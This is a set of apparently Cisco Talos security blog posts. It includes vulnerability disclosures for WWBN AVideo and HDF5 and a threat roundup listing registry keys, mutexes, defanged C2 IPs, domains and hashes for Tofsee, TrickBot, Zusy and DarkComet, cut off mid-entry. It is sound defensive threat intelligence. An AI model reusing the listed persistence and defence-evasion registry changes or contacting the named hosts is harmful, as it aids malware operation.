Much like the Colonial Pipeline ransomware attack, there are also unintended consequences of a cyber-attack that have a way of trickling down into how businesses can operate in an industrial environment. As defenders, we must consider our integrations into industrial operations. Agriculture industries are rapid adopters of industrial automation. The imperative to produce rapidly and deliver to market is driving companies to remove the human element where possible. For example, a fully automated grain elevator removes the need for humans to assist in the unloading of grain, extending the serviceable hours an elevator can stay open for farmers. Automated milking systems make it possible to increase milk cows more frequently, and automated feed pushers keep herds fed so milk production stays consistent.  As you think about cyber defense, ask yourself what does an attack on your converged farms and facilities look like? Would the loss of IT assets trickle into industrial operational technology that lets your business operate? Could you still ship perishable milk? Could a grain elevator still operate?  


What does this mean for cyber defenders?  

The invasion of Ukraine is awful. And it is easy to be lost in the suffering and sacrifice of the Ukrainian people. Now is the time, more than ever, to understand what is at stake and what we can do to keep the world fed. Whether we’re protecting a direct agriculture business, or something agricultural-adjacent, now is the time to reflect on business resiliency. As defenders, we cannot control war, the weather, or the agriculture market. Instead, the security community should consider this an opportunity to improve their situational awareness. By just maintaining awareness of outside events, we can draw a better picture of the current security risks. It can be easy to dismiss global events as having no additional effects on an organization’s cybersecurity posture — we’re under constant attack as it is. Instead, consider not the “what,” but the “why” of adversary motivations, and how that can affect potential targets. Understanding that could make all the difference in keeping businesses safe and productive.  


Executive call to action 

For executive leadership, now is an opportune time to evaluate your accepted business risks. That means taking the time to understand how interconnected your agriculture operations are to your corporate offices. Could you function as a business should a ransomware attack affect you? What investments have you made to build resiliency into your operations? These are incredibly difficult questions to answer. Use the catalyst of global events to invest in technology and more importantly, people, to help you find those answers. Be proactive, and train for climatic events like a cyber-attack. Utilize third-party services to give unbiased evaluations of your resiliency and recovery. Perhaps most importantly – resist complacency. Cybersecurity threats evolve and shift as do global events. Maintaining strong situational awareness could be the critical deciding factor between a crippling costly cyber-attack and a resilient enterprise able to weather any storm. The fate of the world’s agricultural supply chain could rely on it.  

Vulnerability Spotlight: Vulnerabilities in WWBN AVideo web app could lead to command injection, authentication bypass

16 August 2022 at 15:54



Claudio Bozzato of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered multiple vulnerabilities in the WWBN AVideo web application that could allow an attacker to carry out a wide range of malicious actions, including command injection and authentication bypass. 

AVideo is an open-source web application that allows users to build a video streaming and sharing platform. Anyone who joins the community can host videos on-demand, launch a live stream or encode different video formats. 

TALOS-2022-1542 (CVE-2022-32777 - CVE-2022-32778), TALOS-2022-1549 (CVE-2022-32761) and TALOS-2022-1550 (CVE-2022-28710) are information disclosure vulnerabilities that are triggered if an adversary sends the targeted instance a specially crafted HTTP packet. TALOS-2022-1550 and TALOS-2022-1549 could allow the adversary to read arbitrarily selected files in the webserver host, while TALOS-2022-1542 could allow them to steal the session cookie, leading, in the worst case, to takeover of an admin account. 

Some of the most serious vulnerabilities discovered in this product are command execution issues. TALOS-2022-1546 (CVE-2022-30534) and TALOS-2022-1548 (CVE-2022-32572) are triggered in a similar way, and both lead to arbitrary command execution via command injection. TALOS-2022-1547 (CVE-2022-30547) is a directory traversal vulnerability that happens while extracting a zip file and eventually leads to arbitrary command execution. 

 That could allow an attacker to gain access to an administrator’s account: 

The app also contains three vulnerabilities that can be used for privilege escalation: TALOS-2022-1534 (CVE-2022-29468), TALOS-2022-1535 (CVE-2022-30605) and TALOS-2022-1545 (CVE-2022-32282). An attacker could exploit TALOS-2022-1545 to log in with only a hashed version of a user’s password. TALOS-2022-1534 and TALOS-2022-1535 could be triggered if the attacker can trick the user to make a specially crafted HTTP request. Finally, TALOS-2022-1551  (CVE-2022-33147-CVE-2022-33149) is a SQL injection vulnerability that can be used to escalate privileges, for example by extracting an admin password hash that can be used to log in (as explained in TALOS-2022-1545). Cisco Talos worked with WWBN to coordinate disclosure and allow them to patch these vulnerabilities in adherence to Cisco’s vulnerability disclosure policy.

Talos tested and confirmed the following software is affected by these vulnerabilities: WWBN AVideo, version 11.6 and dev master commit 3f7c0364. 

The following SNORTⓇ rules will detect exploitation attempts against this vulnerability: 59993 – 59998, 60003 – 60006, 60071, 60072, 60079, 60080, 60145 – 60153, 60204, 60205 and 60208. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

Vulnerability Spotlight: Three vulnerabilities in HDF5 file format could lead to remote code execution

16 August 2022 at 14:03



Dave McDaniel of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered three vulnerabilities in a library that works with the HDF5 file format that could allow an attacker to execute remote code on a targeted device. 

These issues arise in the libhdf5 gif2h5 tool that’s normally used to convert a GIF file to the HDF5 format, commonly used to store large amounts of numerical data. An attacker could exploit these vulnerabilities by tricking a user into opening a specially crafted, malicious file.

TALOS-2022-1485 (CVE-2022-25972) and TALOS-2022-1486 (CVE-2022-25942) are out-of-bounds write vulnerabilities in the gif2h5 tool that trigger a specific crash, opening the door for code execution from the adversary. TALOS-2022-1487 (CVE-2022-26061) works similarly but is a heap-based buffer overflow vulnerability. 

Cisco Talos is disclosing these vulnerabilities despite no official fix from HDF5 in adherence to the 90-day deadline outlined in Cisco’s vulnerability disclosure policy

Users are encouraged to update these affected products as soon as possible: HDF5 Group libhdf5, version 1.10.4. Talos tested and confirmed these versions of the library could be exploited by these vulnerabilities. 

The following Snort rules will detect exploitation attempts against this vulnerability: 59296, 59297, 59300, 59301, 59303 and 59304. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. 

Threat Roundup for August 5 to August 12

12 August 2022 at 20:12

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Tofsee-9960568-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0 Dropper Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0 Trojan Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0 Dropper Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.Tofsee-9960568-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV
Value Name: DisplayName
1
Mutexes Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf 1
Global\30977501-13fc-11ed-9660-001517215b93 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]146[.]35[.]35 3
31[.]13[.]65[.]174 3
142[.]251[.]40[.]196 3
96[.]103[.]145[.]165 3
31[.]41[.]244[.]82 3
31[.]41[.]244[.]85 3
80[.]66[.]75[.]254 3
80[.]66[.]75[.]4 3
31[.]41[.]244[.]128 3
31[.]41[.]244[.]126/31 3
208[.]76[.]51[.]51 2
74[.]208[.]5[.]20 2
208[.]76[.]50[.]50 2
202[.]137[.]234[.]30 2
212[.]77[.]101[.]4 2
193[.]222[.]135[.]150 2
203[.]205[.]219[.]57 2
47[.]43[.]18[.]9 2
67[.]231[.]144[.]94 2
188[.]125[.]72[.]74 2
40[.]93[.]207[.]0/31 2
205[.]220[.]176[.]72 2
135[.]148[.]130[.]75 2
121[.]53[.]85[.]11 2
67[.]195[.]204[.]72/30 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 3
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 3
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 3
249[.]5[.]55[.]69[.]in-addr[.]arpa 3
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 3
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 3
microsoft-com[.]mail[.]protection[.]outlook[.]com 3
microsoft[.]com 3
www[.]google[.]com 3
www[.]instagram[.]com 3
comcast[.]net 3
mx1a1[.]comcast[.]net 3
jotunheim[.]name 3
niflheimr[.]cn 3
whois[.]arin[.]net 2
whois[.]iana[.]org 2
mx-eu[.]mail[.]am0[.]yahoodns[.]net 2
aspmx[.]l[.]google[.]com 2
mta5[.]am0[.]yahoodns[.]net 2
icloud[.]com 2
cox[.]net 2
walla[.]com 2
hanmail[.]net 2
allstate[.]com 2
wp[.]pl 2
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 3
%SystemRoot%\SysWOW64\config\systemprofile:.repos 3
%SystemRoot%\SysWOW64\fnwisxtv 1
%SystemRoot%\SysWOW64\airdnsoq 1
%SystemRoot%\SysWOW64\uclxhmik 1
%TEMP%\dnyabinr.exe 1
%TEMP%\lcxykqya.exe 1
%TEMP%\qzguacfj.exe 1

File Hashes

098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3 2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957 693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47 a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959 c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243 d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98 ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469 f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.TrickBot-9960840-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS
Value Name: 4334c972
36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS
Value Name: 2d17e659
36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent3
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent5
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent9
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent6
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent7
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent2
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent1
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent8
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent0
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent4
2
Mutexes Occurrences
98b59d0b000000cc 36
98b59d0b00000120 36
Global\{2d17e659d34601689591} 36
98b59d0b00000174 36
98b59d0b00000150 36
98b59d0b00000158 36
98b59d0b000001ac 35
98b59d0b00000308 35
98b59d0b0000043c 35
98b59d0b000004b4 35
98b59d0b000001bc 35
98b59d0b000002ec 35
98b59d0b000001f0 35
98b59d0b000001c4 35
98b59d0b0000021c 35
98b59d0b0000025c 35
98b59d0b00000294 35
98b59d0b00000320 35
98b59d0b000003d4 35
98b59d0b000003f8 35
98b59d0b000004dc 35
98b59d0b0000060c 8
98b59d0b000005cc 8
98b59d0b000004f8 8
98b59d0b00000614 7
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
209[.]197[.]3[.]8 11
72[.]21[.]81[.]240 7
69[.]164[.]46[.]0 6
8[.]253[.]154[.]236/31 3
23[.]46[.]150[.]81 2
23[.]46[.]150[.]58 2
8[.]253[.]141[.]249 1
8[.]253[.]38[.]248 1
8[.]253[.]140[.]118 1
23[.]46[.]150[.]43 1
8[.]247[.]119[.]126 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
download[.]windowsupdate[.]com 36
adtejoyo1377[.]tk 36
Files and or directories created Occurrences
%ProgramData%\c7150968.exe 1
%LOCALAPPDATA%\gusEBBF.tmp.bat 1
%ProgramData%\ba886437.exe 1
%HOMEPATH%\jfpDCC6.tmp.bat 1
%ProgramData%\63b007ed.exe 1
%HOMEPATH%\dtaE10F.tmp.bat 1
%ProgramData%\545ba94b.exe 1
%HOMEPATH%\hcv6907.tmp.bat 1
%ProgramData%\7afae1e8.exe 1
%HOMEPATH%\greA7E2.tmp.bat 1
%ProgramData%\9421c9aa.exe 1
%APPDATA%\vqpA923.tmp.bat 1
%ProgramData%\f779fb59.exe 1
%ProgramData%\xywA29.tmp.bat 1
%ProgramData%\940d0a1e.exe 1
%HOMEPATH%\jawD8CB.tmp.bat 1
%ProgramData%\a37667ce.exe 1
%HOMEPATH%\lkyB72F.tmp.bat 1
%ProgramData%\edcfad58.exe 1
%HOMEPATH%\pvf22C5.tmp.bat 1
%ProgramData%\182b8517.exe 1
%LOCALAPPDATA%\qsw15A4.tmp.bat 1
%ProgramData%\a3a20124.exe 1
%HOMEPATH%\xqh15A4.tmp.bat 1
%ProgramData%\a116e074.exe 1
*See JSON for more IOCs

File Hashes

007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12 017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8 024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6 0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d 02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1 03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b 0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86 03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0 04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d 04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42 049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f 04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f 05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126 0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501 07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6 08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4 08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7 097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7 0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de 0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5 0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888 0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9 0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a 0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653 0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Trojan.Zusy-9960880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: MarkTime
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: FailureActions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: MarkTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Group
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: InstallTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: FailureActions
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Type
1
Mutexes Occurrences
127.0.0.1:8000:Cdefgh 3
112.74.89.58:44366:Cdefgh 3
112.74.89.58:42150:Cdefgh 1
47.100.137.128:8001:Pqrstu 1
22.23.24.56:8001:Pqrstu 1
hz122.f3322.org:8001:Cdefgh 1
112.74.89.58:35807:Cdefgh 1
112.74.89.58:46308:Cdefgh 1
101.33.196.136:3389:Cdefgh 1
127.0.0.1:8001:Cdefgh 1
183.28.28.43:8001:Abcdef 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
112[.]74[.]89[.]58 6
22[.]23[.]24[.]56 1
47[.]100[.]137[.]128 1
101[.]33[.]196[.]136 1
183[.]28[.]28[.]43 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
hz122[.]f3322[.]org 1
Files and or directories created Occurrences
%SystemRoot%\svchost.exe 4

File Hashes

04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc 2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb 466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04 5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d 5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73 5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9 6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400 86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558 b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5 bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103 ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464 f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066 fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkComet-9961766-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Debugger
24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
23
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rundll32
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Updater
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Update
1
Mutexes Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 22
DCPERSFWBP 18
DC_MUTEX-5DND8AT 7
